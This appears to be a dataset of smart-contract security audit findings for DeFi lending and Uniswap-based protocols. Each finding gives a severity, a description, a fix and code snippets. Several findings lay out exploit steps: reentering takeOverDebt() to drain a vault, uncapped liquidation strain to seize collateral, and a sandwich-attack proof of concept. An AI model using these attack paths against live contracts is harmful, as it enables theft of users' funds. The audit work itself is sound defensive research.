Looking at the `Oracle.observe` function, the `secondsPerLiquidityCumulativeX128` return value is calculated as follows:\\n```\\nliqCumL + uint160(((liqCumR - liqCumL) * delta) / denom)\\n```\\n\\nThe calculation is done in an `unchecked` block. `liqCumR` and `liqCumL` have type `uint160`.\\n`delta` and `denom` have type `uint56`.\\nLet's compare this to the Uniswap V3 code.\\n```\\nbeforeOrAt.secondsPerLiquidityCumulativeX128 +\\n uint160(\\n (uint256(\\n atOrAfter.secondsPerLiquidityCumulativeX128 - beforeOrAt.secondsPerLiquidityCumulativeX128\\n ) * targetDelta) / observationTimeDelta\\n )\\n```\\n\\nThe result of `atOrAfter.secondsPerLiquidityCumulativeX128 - beforeOrAt.secondsPerLiquidityCumulativeX128` is cast to `uint256`.\\nThat's because multiplying the result by `targetDelta` can overflow the `uint160` type.\\nThe maximum value of `uint160` is roughly `1.5e48`.\\n`delta` is simply the time difference between `timeL` and `target` in seconds.\\n```\\nsecondsPerLiquidityCumulativeX128: last.secondsPerLiquidityCumulativeX128 +\\n ((uint160(delta) << 128) / (liquidity > 0 ? liquidity : 1)),\\n```\\n\\nIf `liquidity` is very low and the time difference between observations is very big (hours to days), this can lead to the intermediate overflow in the `Oracle` library, such that the `secondsPerLiquidityCumulative` is much smaller than it should be.\\nThe lowest value for the above division is `1`. In that case the accumulator grows by `2^128` (~3.4e38) every second.\\nIf observations are apart 24 hours (86400 seconds), this can lead to an overflow: Assume for simplicity `target - timeL = timeR - timeL`\\n```\\n(liqCumR - liqCumL) * delta = 3.4e38 * 86400 * 86400 > 1.5e48`\\n```\\n
Perform the same cast to `uint256` that Uniswap V3 performs:\\n```\\nliqCumL + uint160((uint256(liqCumR - liqCumL) * delta) / denom)\\n```\\n
The corrupted return value affects the `Volatility` library. Specifically, the IV calculation.\\nThis can lead to wrong IV updates and LTV ratios that do not reflect the true IV, making the application more prone to bad debt or reducing capital efficiency.
```\\nliqCumL + uint160(((liqCumR - liqCumL) * delta) / denom)\\n```\\n
The whole ante balance of a user with a very small loan, who is up for liquidation can be stolen without repaying the debt
medium
Users face liquidation risk when their Borrower contract's collateral falls short of covering their loan. The `strain` parameter in the liquidation process enables liquidators to partially repay an unhealthy loan. Using a `strain` smaller than 1 results in the liquidator receiving a fraction of the user's collateral based on `collateral / strain`.\\nThe problem arises from the fact that the `strain` value is not capped, allowing for a potentially harmful scenario. For instance, a user with an unhealthy loan worth $0.30 in a WBTC (8-decimal token) vault on Arbitrum (with very low gas costs) has $50 worth of ETH (with a price of $1500) as collateral in their Borrower contract. A malicious liquidator spots the unhealthy loan and submits a liquidation transaction with a `strain` value of 1e3 + 1. Since the `strain` exceeds the loan value, the liquidator's repayment amount gets rounded down to 0, effectively allowing them to claim the collateral with only the cost of gas.\\n```\\nassembly ("memory-safe") {\\n // // rest of code\\n liabilities0 := div(liabilities0, strain) // @audit rounds down to 0 <-\\n liabilities1 := div(liabilities1, strain) // @audit rounds down to 0 <-\\n // // rest of code\\n}\\n```\\n\\nFollowing this, the execution bypasses the `shouldSwap` if-case and proceeds directly to the following lines:\\n```\\n// @audit Won't be repaid in full since the loan is insolvent\\n_repay(repayable0, repayable1);\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n\\n// @audit will transfer the user 2e14 (0.5$)\\npayable(callee).transfer(address(this).balance / strain);\\nemit Liquidate(repayable0, repayable1, incentive1, priceX128);\\n```\\n\\nGiven the low gas price on Arbitrum, this transaction becomes profitable for the malicious liquidator, who can repeat it to drain the user's collateral without repaying the loan. This not only depletes the user's collateral but also leaves a small amount of bad debt on the market, potentially causing accounting issues for the vaults.
Consider implementing a check to determine whether the repayment impact is zero or not before transferring ETH to such liquidators.\\n```\\nrequire(repayable0 != 0 || repayable1 != 0, "Zero repayment impact.") // @audit <-\\n_repay(repayable0, repayable1);\\n\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n\\npayable(callee).transfer(address(this).balance / strain);\\nemit Liquidate(repayable0, repayable1, incentive1, priceX128);\\n```\\n\\nAdditionally, contemplate setting a cap for the `strain` and potentially denoting it in basis points (BPS) instead of a fraction. This allows for more flexibility when users intend to repay a percentage lower than 100% but higher than 50% (e.g., 60%, 75%, etc.).
Users with small loans face the theft of their collateral without the bad debt being covered, leading to financial losses for the user. Additionally, this results in a potential amount of bad debt that can disrupt the vault's accounting.
```\\nassembly ("memory-safe") {\\n // // rest of code\\n liabilities0 := div(liabilities0, strain) // @audit rounds down to 0 <-\\n liabilities1 := div(liabilities1, strain) // @audit rounds down to 0 <-\\n // // rest of code\\n}\\n```\\n
Wrong auctionPrice used in calculating BPF to determine bond reward (or penalty)
medium
2.In _prepareTake() function,the BPF is calculated using vars.auctionPrice which is calculated by _auctionPrice() function.\\n```\\nfunction _prepareTake(\\n Liquidation memory liquidation_,\\n uint256 t0Debt_,\\n uint256 collateral_,\\n uint256 inflator_\\n ) internal view returns (TakeLocalVars memory vars) {\\n // rest of code// rest of code..\\n vars.auctionPrice = _auctionPrice(liquidation_.referencePrice, kickTime);\\n vars.bondFactor = liquidation_.bondFactor;\\n vars.bpf = _bpf(\\n vars.borrowerDebt,\\n collateral_,\\n neutralPrice,\\n liquidation_.bondFactor,\\n vars.auctionPrice\\n );\\n```\\n\\n3.The _takeBucket() function made a judgment after _prepareTake()\\n```\\n // cannot arb with a price lower than the auction price\\nif (vars_.auctionPrice > vars_.bucketPrice) revert AuctionPriceGtBucketPrice();\\n// if deposit take then price to use when calculating take is bucket price\\nif (params_.depositTake) vars_.auctionPrice = vars_.bucketPrice;\\n```\\n\\nso the root cause of this issue is that in a scenario where a user calls Deposit Take(params_.depositTake ==true) ,BPF will calculated base on vars_.auctionPrice instead of bucketPrice.\\n```\\n vars_ = _calculateTakeFlowsAndBondChange(\\n borrower_.collateral,\\n params_.inflator,\\n params_.collateralScale,\\n vars_\\n );\\n// rest of code// rest of code// rest of code// rest of code.\\n_rewardBucketTake(\\n auctions_,\\n deposits_,\\n buckets_,\\n liquidation,\\n params_.index,\\n params_.depositTake,\\n vars_\\n );\\n```\\n
In the case of Deposit Take calculate BPF using bucketPrice instead of auctionPrice .
Wrong auctionPrice used in calculating BFP which subsequently influences the _calculateTakeFlowsAndBondChange() and _rewardBucketTake() function will result in bias .\\nFollowing the example of the Whitepaper(section 7.4.2 Deposit Take): BPF = 0.011644 * (1222.6515-1100 / 1222.6515-1050) = 0.008271889129 The collateral purchased is min{20, 20000/(1-0.00827) * 1100, 21000/(1-0.01248702772 )* 1100)} which is 18.3334 unit of ETH .Therefore, 18.3334 ETH are moved from the loan into the claimable collateral of bucket 1100, and the deposit is reduced to 0. Dave is awarded LPB in that bucket worth 18. 3334 · 1100 · 0. 008271889129 = 166. 8170374 𝐷𝐴𝐼. The debt repaid is 19914.99407 DAI\\n\\nBased on the current implementations: BPF = 0.011644 * (1222.6515-1071.77 / 1222.6515-1050) = 0.010175. TPF = 5/4*0.011644 - 1/4 *0.010175 = 0.01201125. The collateral purchased is 18.368 unit of ETH. The debt repaid is 20000 * (1-0.01201125) / (1-0.010175) = 19962.8974DAI Dave is awarded LPB in that bucket worth 18. 368 · 1100 · 0. 010175 = 205.58 𝐷𝐴𝐼.\\nSo,Dave earn more rewards(38.703 DAI) than he should have.\\nAs the Whitepaper says: " the caller would typically have other motivations. She might have called it because she is Carol, who wanted to buy the ETH but not add additional DAI to the contract. She might be Bob, who is looking to get his debt repaid at the best price. She might be Alice, who is looking to avoid bad debt being pushed into the contract. She also might be Dave, who is looking to ensure a return on his liquidation bond."
```\\nfunction _prepareTake(\\n Liquidation memory liquidation_,\\n uint256 t0Debt_,\\n uint256 collateral_,\\n uint256 inflator_\\n ) internal view returns (TakeLocalVars memory vars) {\\n // rest of code// rest of code..\\n vars.auctionPrice = _auctionPrice(liquidation_.referencePrice, kickTime);\\n vars.bondFactor = liquidation_.bondFactor;\\n vars.bpf = _bpf(\\n vars.borrowerDebt,\\n collateral_,\\n neutralPrice,\\n liquidation_.bondFactor,\\n vars.auctionPrice\\n );\\n```\\n
Incorrect implementation of `BPF` leads to kicker losing rewards in a `take` action
medium
The Bond Payment Factor (BPF) is the formula that determines the reward/penalty over the bond of a kicker in each `take` action. According to the whitepaper, the formula is described as:\\n```\\n// If TP < NP\\nBPF = bondFactor * min(1, max(-1, (NP - price) / (NP - TP)))\\n\\n// If TP >= NP\\nBPF = bondFactor (if price <= NP)\\nBPF = -bondFactor (if price > NP)\\n```\\n\\n```\\nfunction _bpf(\\n uint256 debt_,\\n uint256 collateral_,\\n uint256 neutralPrice_,\\n uint256 bondFactor_,\\n uint256 auctionPrice_\\n) pure returns (int256) {\\n int256 thresholdPrice = int256(Maths.wdiv(debt_, collateral_));\\n\\n int256 sign;\\n if (thresholdPrice < int256(neutralPrice_)) {\\n // BPF = BondFactor * min(1, max(-1, (neutralPrice - price) / (neutralPrice - thresholdPrice)))\\n sign = Maths.minInt(\\n 1e18,\\n Maths.maxInt(\\n -1 * 1e18,\\n PRBMathSD59x18.div(\\n int256(neutralPrice_) - int256(auctionPrice_),\\n int256(neutralPrice_) - thresholdPrice\\n )\\n )\\n );\\n } else {\\n int256 val = int256(neutralPrice_) - int256(auctionPrice_);\\n if (val < 0 ) sign = -1e18;\\n else if (val != 0) sign = 1e18; // @audit Sign will be zero when NP = auctionPrice\\n }\\n\\n return PRBMathSD59x18.mul(int256(bondFactor_), sign);\\n}\\n```\\n\\nThe issue is that the implementation of the `BPF` formula in the code doesn't match the specification, leading to the loss of rewards in that `take` action in cases where `TP >= NP` and `price = NP`.\\nAs showed in the above snippet, in cases where `TP >= NP` and `NP = price` (thus val = 0) the function won't set a value for `sign` (will be `0` by default) so that will result in a computed `BPF` of `0`, instead of `bondFactor` that would be the correct `BPF`.
Change the `_bpf` function to match the specification in order to fairly distribute the rewards in a `take` action:\\n```\\nfunction _bpf(\\n uint256 debt_,\\n uint256 collateral_,\\n uint256 neutralPrice_,\\n uint256 bondFactor_,\\n uint256 auctionPrice_\\n) pure returns (int256) {\\n int256 thresholdPrice = int256(Maths.wdiv(debt_, collateral_));\\n\\n int256 sign;\\n if (thresholdPrice < int256(neutralPrice_)) {\\n // BPF = BondFactor * min(1, max(// Remove the line below\\n1, (neutralPrice // Remove the line below\\n price) / (neutralPrice // Remove the line below\\n thresholdPrice)))\\n sign = Maths.minInt(\\n 1e18,\\n Maths.maxInt(\\n // Remove the line below\\n1 * 1e18,\\n PRBMathSD59x18.div(\\n int256(neutralPrice_) // Remove the line below\\n int256(auctionPrice_),\\n int256(neutralPrice_) // Remove the line below\\n thresholdPrice\\n )\\n )\\n );\\n } else {\\n int256 val = int256(neutralPrice_) // Remove the line below\\n int256(auctionPrice_);\\n if (val < 0 ) sign = // Remove the line below\\n1e18;\\n// Remove the line below\\n else if (val != 0) sign = 1e18;\\n// Add the line below\\n else sign = 1e18;\\n }\\n\\n return PRBMathSD59x18.mul(int256(bondFactor_), sign);\\n}\\n```\\n
The kicker will lose the rewards in that `take` action if the previous conditions are satisfied.\\nWhile the probability of this conditions to be met is not usual, the impact is the loss of rewards for that kicker and that may cause to lose part of the bond if later a `take` is performed with a negative `BPF`.
```\\n// If TP < NP\\nBPF = bondFactor * min(1, max(-1, (NP - price) / (NP - TP)))\\n\\n// If TP >= NP\\nBPF = bondFactor (if price <= NP)\\nBPF = -bondFactor (if price > NP)\\n```\\n
First pool borrower pays extra interest
medium
For any function in which the current interest rate is important in a pool, we compute interest updates by accruing with `_accruePoolInterest` at the start of the function, then execute the main logic, then update the interest state accordingly with `_updateInterestState`. See below a simplified example for ERC20Pool.drawDebt:\\n```\\nfunction drawDebt(\\n address borrowerAddress_,\\n uint256 amountToBorrow_,\\n uint256 limitIndex_,\\n uint256 collateralToPledge_\\n) external nonReentrant {\\n PoolState memory poolState = _accruePoolInterest();\\n\\n // rest of code\\n\\n DrawDebtResult memory result = BorrowerActions.drawDebt(\\n auctions,\\n deposits,\\n loans,\\n poolState,\\n _availableQuoteToken(),\\n borrowerAddress_,\\n amountToBorrow_,\\n limitIndex_,\\n collateralToPledge_\\n );\\n\\n // rest of code\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, result.newLup);\\n\\n // rest of code\\n}\\n```\\n\\nWhen accruing interest in `_accruePoolInterest`, we only update the state if `poolState_.t0Debt != 0`. Most notably, we don't set `poolState_.isNewInterestAccrued`. See below simplified logic from _accruePoolInterest:\\n```\\n// check if t0Debt is not equal to 0, indicating that there is debt to be tracked for the pool\\nif (poolState_.t0Debt != 0) {\\n // rest of code\\n\\n // calculate elapsed time since inflator was last updated\\n uint256 elapsed = block.timestamp - inflatorState.inflatorUpdate;\\n\\n // set isNewInterestAccrued field to true if elapsed time is not 0, indicating that new interest may have accrued\\n poolState_.isNewInterestAccrued = elapsed != 0;\\n\\n // rest of code\\n}\\n```\\n\\nOf course before we actually update the state from the first borrow, the debt of the pool is 0, and recall that `_accruePoolInterest` runs before the main state changing logic of the function in `BorrowerActions.drawDebt`.\\nAfter executing the main state changing logic in `BorrowerActions.drawDebt`, where we update state, including incrementing the pool and borrower debt as expected, we run the logic in `_updateInterestState`. Here we update the inflator if either `poolState_.isNewInterestAccrued` or `poolState_.debt == 0`.\\n```\\n// update pool inflator\\nif (poolState_.isNewInterestAccrued) {\\n inflatorState.inflator = uint208(poolState_.inflator);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n// if the debt in the current pool state is 0, also update the inflator and inflatorUpdate fields in inflatorState\\n// slither-disable-next-line incorrect-equality\\n} else if (poolState_.debt == 0) {\\n inflatorState.inflator = uint208(Maths.WAD);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n}\\n```\\n\\nThe problem here is that since there was no debt at the start of the function, `poolState_.isNewInterestAccrued` is false and since there is debt now at the end of the function, `poolState_.debt == 0` is also false. As a result, the inflator is not updated. Updating the inflator here is paramount since it effectively marks a starting time at which interest accrues on the borrowers debt. Since we don't update the inflator, the borrowers debt effectively started accruing interest at the time of the last inflator update, which is an arbitrary duration.\\nWe can prove this vulnerability by modifying `ERC20PoolBorrow.t.sol:testPoolBorrowAndRepay` to skip 100 days before initially drawing debt:\\n```\\nfunction testPoolBorrowAndRepay() external tearDown {\\n // check balances before borrow\\n assertEq(_quote.balanceOf(address(_pool)), 50_000 * 1e18);\\n assertEq(_quote.balanceOf(_lender), 150_000 * 1e18);\\n\\n // @audit skip 100 days to break test\\n skip(100 days);\\n\\n _drawDebt({\\n from: _borrower,\\n borrower: _borrower,\\n amountToBorrow: 21_000 * 1e18,\\n limitIndex: 3_000,\\n collateralToPledge: 100 * 1e18,\\n newLup: 2_981.007422784467321543 * 1e18\\n });\\n\\n // rest of code\\n}\\n```\\n\\nUnlike the result without skipping time before drawing debt, the test fails with output logs being off by amounts roughly corresponding to the unexpected interest.
Issue First pool borrower pays extra interest\\nWhen checking whether the debt of the pool is 0 to determine whether to reset the inflator, it should not only check whether the debt is 0 at the end of execution, but also whether the debt was 0 before execution. To do so, we should cache the debt at the start of the function and modify the `_updateInterestState` logic to be something like:\\n```\\n// update pool inflator\\nif (poolState_.isNewInterestAccrued) {\\n inflatorState.inflator = uint208(poolState_.inflator);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n// if the debt in the current pool state is 0, also update the inflator and inflatorUpdate fields in inflatorState\\n// slither-disable-next-line incorrect-equality\\n// @audit reset inflator if no debt before execution\\n} else if (poolState_.debt == 0 || debtBeforeExecution == 0) {\\n inflatorState.inflator = uint208(Maths.WAD);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n}\\n```\\n
First borrower always pays extra interest, with losses depending upon time between adding liquidity and drawing debt and amount of debt drawn.\\nNote also that there's an attack vector here in which the liquidity provider can intentionally create and fund the pool a long time before announcing it, causing the initial borrower to lose a significant amount to interest.
```\\nfunction drawDebt(\\n address borrowerAddress_,\\n uint256 amountToBorrow_,\\n uint256 limitIndex_,\\n uint256 collateralToPledge_\\n) external nonReentrant {\\n PoolState memory poolState = _accruePoolInterest();\\n\\n // rest of code\\n\\n DrawDebtResult memory result = BorrowerActions.drawDebt(\\n auctions,\\n deposits,\\n loans,\\n poolState,\\n _availableQuoteToken(),\\n borrowerAddress_,\\n amountToBorrow_,\\n limitIndex_,\\n collateralToPledge_\\n );\\n\\n // rest of code\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, result.newLup);\\n\\n // rest of code\\n}\\n```\\n
Function `_indexOf` will cause a settlement to revert if `auctionPrice > MAX_PRICE`
medium
In ERC721 pools, when a settlement occurs and the borrower still have some fraction of collateral, that fraction is allocated in the bucket with a price closest to `auctionPrice` and the borrower is proportionally compensated with LPB in that bucket.\\nIn order to calculate the index of the bucket closest in price to `auctionPrice`, the `_indexOf` function is called. The first line of that function is outlined below:\\n```\\nif (price_ < MIN_PRICE || price_ > MAX_PRICE) revert BucketPriceOutOfBounds();\\n```\\n\\nThe `_indexOf` function will revert if `price_` (provided as an argument) is below `MIN_PRICE` or above `MAX_PRICE`. This function is called from `_settleAuction`, here is a snippet of that:\\n```\\nfunction _settleAuction(\\n AuctionsState storage auctions_,\\n mapping(uint256 => Bucket) storage buckets_,\\n DepositsState storage deposits_,\\n address borrowerAddress_,\\n uint256 borrowerCollateral_,\\n uint256 poolType_\\n) internal returns (uint256 remainingCollateral_, uint256 compensatedCollateral_) {\\n\\n // // rest of code\\n\\n uint256 auctionPrice = _auctionPrice(\\n auctions_.liquidations[borrowerAddress_].referencePrice,\\n auctions_.liquidations[borrowerAddress_].kickTime\\n );\\n\\n // determine the bucket index to compensate fractional collateral\\n> bucketIndex = auctionPrice > MIN_PRICE ? _indexOf(auctionPrice) : MAX_FENWICK_INDEX;\\n\\n // // rest of code\\n}\\n```\\n\\nThe `_settleAuction` function first calculates the `auctionPrice` and then it gets the index of the bucket with a price closest to `bucketPrice`. If `auctionPrice` results to be bigger than `MAX_PRICE`, then the `_indexOf` function will revert and the entire settlement will fail.\\nIn certain types of pools where one asset has an extremely low market price and the other is valued really high, the resulting prices at an auction can be so high that is not rare to see an `auctionPrice > MAX_PRICE`.\\nThe `auctionPrice` variable is computed from `referencePrice` and it goes lower through time until 72 hours have passed. Also, `referencePrice` can be much higher than `MAX_PRICE`, as outline in _kick:\\n```\\nvars.referencePrice = Maths.min(Maths.max(vars.htp, vars.neutralPrice), MAX_INFLATED_PRICE);\\n```\\n\\nThe value of `MAX_INFLATED_PRICE` is exactly 50 * `MAX_PRICE` so a `referencePrice` bigger than `MAX_PRICE` is totally possible.\\nIn auctions where `referencePrice` is bigger than `MAX_PRICE` and the auction is settled in a low time frame, `auctionPrice` will be also bigger than `MAX_PRICE` and that will cause the entire transaction to revert.
It's recommended to change the affected line of `_settleAuction` in the following way:\\n```\\n// Remove the line below\\n bucketIndex = auctionPrice > MIN_PRICE ? _indexOf(auctionPrice) : MAX_FENWICK_INDEX;\\n// Add the line below\\n if(auctionPrice < MIN_PRICE){\\n// Add the line below\\n bucketIndex = MAX_FENWICK_INDEX;\\n// Add the line below\\n } else if (auctionPrice > MAX_PRICE) {\\n// Add the line below\\n bucketIndex = 1;\\n// Add the line below\\n } else {\\n// Add the line below\\n bucketIndex = _indexOf(auctionPrice);\\n// Add the line below\\n }\\n```\\n
When the above conditions are met, the auction won't be able to settle until `auctionPrice` lowers below `MAX_PRICE`.\\nIn ERC721 pools with a high difference in assets valuation, there is no low-probability prerequisites and the impact will be a violation of the system design, as well as the potential losses for the kicker of that auction, so setting severity to be high
```\\nif (price_ < MIN_PRICE || price_ > MAX_PRICE) revert BucketPriceOutOfBounds();\\n```\\n
Adversary can reenter takeOverDebt() during liquidation to steal vault funds
high
First we'll walk through a high level breakdown of the issue to have as context for the rest of the report:\\nCreate a custom token that allows them to take control of the transaction and to prevent liquidation\\nFund UniV3 LP with target token and custom token\\nBorrow against LP with target token as the hold token\\nAfter some time the position become liquidatable\\nBegin liquidating the position via repay()\\nUtilize the custom token during the swap in repay() to gain control of the transaction\\nUse control to reenter into takeOverDebt() since it lack nonReentrant modifier\\nLoan is now open on a secondary address and closed on the initial one\\nTransaction resumes (post swap) on repay()\\nFinish repayment and refund all initial LP\\nPosition is still exists on new address\\nAfter some time the position become liquidatable\\nLoan is liquidated and attacker is paid more LP\\nVault is at a deficit due to refunding LP twice\\nRepeat until the vault is drained of target token\\nLiquidityManager.sol#L279-L287\\n```\\n_v3SwapExactInput(\\n v3SwapExactInputParams({\\n fee: params.fee,\\n tokenIn: cache.holdToken,\\n tokenOut: cache.saleToken,\\n amountIn: holdTokenAmountIn,\\n amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) /\\n Constants.BPS\\n })\\n```\\n\\nThe control transfer happens during the swap to UniV3. Here when the custom token is transferred, it gives control back to the attacker which can be used to call takeOverDebt().\\nLiquidityBorrowingManager.sol#L667-L672\\n```\\n _removeKeysAndClearStorage(borrowing.borrower, params.borrowingKey, loans);\\n // Pay a profit to a msg.sender\\n _pay(borrowing.holdToken, address(this), msg.sender, holdTokenBalance);\\n _pay(borrowing.saleToken, address(this), msg.sender, saleTokenBalance);\\n\\n emit Repay(borrowing.borrower, msg.sender, params.borrowingKey);\\n```\\n\\nThe reason the reentrancy works is because the actual borrowing storage state isn't modified until AFTER the control transfer. This means that the position state is fully intact for the takeOverDebt() call, allowing it to seamlessly transfer to another address behaving completely normally. After the repay() call resumes, _removeKeysAndClearStorage is called with the now deleted borrowKey.\\nKeys.sol#L31-L42\\n```\\nfunction removeKey(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n self.unsafeAccess(i).value = self.unsafeAccess(length - 1).value;\\n self.pop();\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nThe unique characteristic of deleteKey is that it doesn't revert if the key doesn't exist. This allows "removing" keys from an empty array without reverting. This allows the repay call to finish successfully.\\nLiquidityBorrowingManager.sol#L450-L452\\n```\\n //newBorrowing.accLoanRatePerSeconds = oldBorrowing.accLoanRatePerSeconds;\\n _pay(oldBorrowing.holdToken, msg.sender, VAULT_ADDRESS, collateralAmt + feesDebt);\\n emit TakeOverDebt(oldBorrowing.borrower, msg.sender, borrowingKey, newBorrowingKey);\\n```\\n\\nNow we can see how this creates a deficit in the vault. When taking over an existing debt, the user is only required to provide enough hold token to cover any fee debt and any additional collateral to pay fees for the newly transferred position. This means that the user isn't providing any hold token to back existing LP.\\nLiquidityBorrowingManager.sol#L632-L636\\n```\\n Vault(VAULT_ADDRESS).transferToken(\\n borrowing.holdToken,\\n address(this),\\n borrowing.borrowedAmount + liquidationBonus\\n );\\n```\\n\\nOn the other hand repay transfers the LP backing funds from the vault. Since the same position is effectively liquidated twice, it will withdraw twice as much hold token as was originally deposited and no new LP funds are added when the position is taken over. This causes a deficit in the vault since other users funds are being withdrawn from the vault.
Add the `nonReentrant` modifier to `takeOverDebt()`
Vault can be drained
```\\n_v3SwapExactInput(\\n v3SwapExactInputParams({\\n fee: params.fee,\\n tokenIn: cache.holdToken,\\n tokenOut: cache.saleToken,\\n amountIn: holdTokenAmountIn,\\n amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) /\\n Constants.BPS\\n })\\n```\\n
Creditor can maliciously burn UniV3 position to permanently lock funds
high
NonfungiblePositionManager\\n```\\nfunction ownerOf(uint256 tokenId) public view virtual override returns (address) {\\n return _tokenOwners.get(tokenId, "ERC721: owner query for nonexistent token");\\n}\\n```\\n\\nWhen querying a nonexistent token, ownerOf will revert. Now assuming the NFT is burnt we can see how every method for repayment is now lost.\\nLiquidityManager.sol#L306-L308\\n```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n```\\n\\nIf the user is being liquidated or repaying themselves the above lines are called for each loan. This causes all calls of this nature to revert.\\nLiquidityBorrowingManager.sol#L727-L732\\n```\\n for (uint256 i; i < loans.length; ) {\\n LoanInfo memory loan = loans[i];\\n // Get the owner address of the loan's token ID using the underlyingPositionManager contract.\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Check if the owner of the loan's token ID is equal to the `msg.sender`.\\n if (creditor == msg.sender) {\\n```\\n\\nThe only other option to recover funds would be for each of the other lenders to call for an emergency withdrawal. The problem is that this pathway will also always revert. It cycles through each loan causing it to query ownerOf() for each token. As we know this reverts. The final result is that once this happens, there is no way possible to close the position.
I would recommend storing each initial creditor when a loan is opened. Add try-catch blocks to each `ownerOf()` call. If the call reverts then use the initial creditor, otherwise use the current owner.
Creditor can maliciously lock all funds
```\\nfunction ownerOf(uint256 tokenId) public view virtual override returns (address) {\\n return _tokenOwners.get(tokenId, "ERC721: owner query for nonexistent token");\\n}\\n```\\n
No slippage protection during repayment due to dynamic slippage params and easily influenced `slot0()`
high
The absence of slippage protection can be attributed to two key reasons. Firstly, the `sqrtPrice` is derived from `slot0()`, which can be easily manipulated:\\n```\\n function _getCurrentSqrtPriceX96(\\n bool zeroForA,\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n ) private view returns (uint160 sqrtPriceX96) {\\n if (!zeroForA) {\\n (tokenA, tokenB) = (tokenB, tokenA);\\n }\\n address poolAddress = computePoolAddress(tokenA, tokenB, fee);\\n (sqrtPriceX96, , , , , , ) = IUniswapV3Pool(poolAddress).slot0(); //@audit-issue can be easily manipulated\\n }\\n```\\n\\nThe calculated `sqrtPriceX96` is used to determine the amounts for restoring liquidation and the number of holdTokens to be swapped for saleTokens:\\n```\\n(uint256 holdTokenAmountIn, uint256 amount0, uint256 amount1) = _getHoldTokenAmountIn(\\n params.zeroForSaleToken,\\n cache.tickLower,\\n cache.tickUpper,\\n cache.sqrtPriceX96,\\n loan.liquidity,\\n cache.holdTokenDebt\\n );\\n```\\n\\nAfter that, the number of `SaleTokemAmountOut` is gained based on the sqrtPrice via QuoterV2.\\nThen, the slippage params are calculated `amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) / Constants.BPS })` However, the `saleTokenAmountOut` is a dynamic number calculated on the current state of the blockchain, based on the calculations mentioned above. This will lead to the situation that the swap will always satisfy the `amountOutMinimum`.\\nAs a result, if the repayment of the user is sandwiched (frontrunned), the profit of the repayer is decreased till the repayment satisfies the restored liquidity.\\nA Proof of Concept (PoC) demonstrates the issue with comments. Although the swap does not significantly impact a strongly founded pool, it does result in a loss of a few dollars for the repayer.\\n```\\n let amountWBTC = ethers.utils.parseUnits("0.05", 8); //token0\\n const deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\nlet params = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\nawait borrowingManager.connect(bob).borrow(params, deadline);\\n\\nconst borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n const swapParamsRep: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n \\n amountWBTC = ethers.utils.parseUnits("0.06", 8); //token0\\n\\nlet swapping: ISwapRouter.ExactInputSingleParamsStruct = {\\n tokenIn: WBTC_ADDRESS,\\n tokenOut: WETH_ADDRESS,\\n fee: 500,\\n recipient: alice.address,\\n deadline: deadline,\\n amountIn: ethers.utils.parseUnits("100", 8),\\n amountOutMinimum: 0,\\n sqrtPriceLimitX96: 0\\n };\\n await router.connect(alice).exactInputSingle(swapping);\\n console.log("Swap success");\\n\\n let paramsRep: LiquidityBorrowingManager.RepayParamsStruct = {\\n isEmergency: false,\\n internalSwapPoolfee: 500,\\n externalSwap: swapParamsRep,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 990, //<=slippage simulated\\n };\\n await borrowingManager.connect(bob).repay(paramsRep, deadline);\\n // Without swap\\n// Balance of hold token after repay: BigNumber { value: "993951415" }\\n// Balance of sale token after repay: BigNumber { value: "99005137946252426108" }\\n// When swap\\n// Balance of hold token after repay: BigNumber { value: "993951415" }\\n// Balance of sale token after repay: BigNumber { value: "99000233164653177505" }\\n```\\n\\nThe following table shows difference of recieved sale token:\\nSwap before repay transaction Token Balance of user after Repay\\nNo WETH 99005137946252426108\\nYes WETH 99000233164653177505\\nThe difference in the profit after repayment is 4904781599248603 weis, which is at the current market price of around 8 USD. The profit loss will depend on the liquidity in the pool, which depends on the type of pool and related tokens.
To address this issue, avoid relying on slot0 and instead utilize Uniswap TWAP. Additionally, consider manually setting values for amountOutMin for swaps based on data acquired before repayment.
The absence of slippage protection results in potential profit loss for the repayer.
```\\n function _getCurrentSqrtPriceX96(\\n bool zeroForA,\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n ) private view returns (uint160 sqrtPriceX96) {\\n if (!zeroForA) {\\n (tokenA, tokenB) = (tokenB, tokenA);\\n }\\n address poolAddress = computePoolAddress(tokenA, tokenB, fee);\\n (sqrtPriceX96, , , , , , ) = IUniswapV3Pool(poolAddress).slot0(); //@audit-issue can be easily manipulated\\n }\\n```\\n
